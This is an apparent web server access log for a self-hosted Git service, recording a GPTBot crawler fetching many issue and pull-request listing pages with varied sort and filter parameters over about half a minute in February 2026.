"/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:19:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2f.vscode%2ftasks.json" [Client 74.7.227.38] [Length 25942] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tags.rss" [Client 74.7.227.38] [Length 343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/tags" +[17/Feb/2026:19:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:21:14 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:19:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 